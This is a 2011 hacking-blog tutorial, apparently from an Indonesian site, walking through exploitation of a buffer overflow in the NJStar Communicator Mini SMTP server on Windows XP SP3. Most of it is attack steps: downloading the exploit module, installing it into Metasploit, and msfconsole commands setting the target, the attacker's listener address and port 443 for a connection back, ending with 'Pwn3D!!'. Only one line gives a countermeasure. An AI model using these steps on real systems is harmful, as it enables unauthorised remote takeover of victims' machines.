,
Headlines News :
Home » » Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability (by heykhend )

Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability (by heykhend )

Written By Nanda Journey on Minggu, 20 November 2011 | 12.10

Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5R1

Victim O.S : Windows XP SP3

Exploit Credit : Dillon Beresford

When I see this exploit 2 weeks ago I'm thinking why I never know about this software before?Because inside China itself, the most popular software for writing a Chinese character was Sogou. Maybe it's because this NJStar have English version so this software should be more popular for users outside China where they just start learn about Chinese Hanzi characters 
This software also have a mini SMTP server to sending an e-mail, so just one click you can send an e-mail to every destination you want.
So how the exploit works?
According to metasploit.com this exploit will exploiting minismtp.exe because this is the only one NJStar component in memory and it's base starts with a 0×00.

Requirements :

1. NJstar 300 Communicator Mini SMTP Server application (press CTRL + Click my affiliations box to view the download link below)
2. NJstar SMTP Exploit
Mediafire.com

Step by Step :

Attacker IP Address : 192.168.8.93

Victim IP Address : 192.168.8.94

1. Download the required file above(the application and exploit).
- Install the vulnerable application on your Windows XP SP3 machine.
- Copy the NJStar SMTP Exploit into your attacker machine and put in /pentest/exploits/framework/modules/exploits/windows/smtp/ (FYI : this location depends on where you install your metasploit framework especially for Windows user)
2. Open your terminal(CTRL+ALT+T) and run metasploit console by typing msfconsole, then use the exploit we've just added before and do not forget do describe the payload also.
Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability
3. You can view the available switch by typing show options command from your msfconsole. In the picture below was my switch configuration to make the exploit works.
Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability
Information :

msf  exploit(njstar_smtp_bof) > set rhost 192.168.8.94 --> set the target IP Address
rhost => 192.168.8.94
msf  exploit(njstar_smtp_bof) > set lhost 192.168.8.93 --> set attacker IP Address to handle connection when exploit success
lhost => 192.168.8.93
msf  exploit(njstar_smtp_bof) > set lport 443 --> attacker local port to handle connection
lport => 443
msf  exploit(njstar_smtp_bof) > set target 0 --> set the target to windows xp sp2/sp3
target => 0
4. When everything has been set up nicely, now let's try the exploit is it works or not by running exploit command from your msfconsole.
Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability
Pwn3D!!

Countermeasures :

1. Update your NJStar Communicator to the latest version.
Hope it's useful 
nb : click the grey area of my affiliations box to view the download lin


i love indonesia
Anda sedang membaca artikel tentang Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability (by heykhend ) dan anda bisa menemukan artikel Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability (by heykhend ) ini dengan url http://hy-hack.blogspot.com/2011/11/hacking-windows-xp-sp3-via-njstar-300.html,Dilarang menduplikat artikel ini Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability (by heykhend ) jika sangat bermanfaat hanya boleh sebagai artikel refrensi atau harus mengulas nya dengan bahasa / kalimat yang berbeda dan memberi link ini : Hacking Windows XP SP3 via NJStar 300 Communicator Mini SMTP Server Vulnerability (by heykhend )


Artikel Terkait:

Share this post :

Poskan Komentar

Blog Dofolow , Tapi Tolong jangan nyepam dan ada kata kata yang tidak baik

 
Support : Abaut Us | Contact Us | Privacy Policy | Term of Use | Redaksi | Advertise | Lowongan Kerja | Forum | Tabloit | Mobile Version | Hy Hack Toolbar
Copyright © 2011. HY hack - All Rights Reserved Template Created by Heykhend
Published by Heykhend Corp. Developed by PT Heykhend Publik Media (HPM)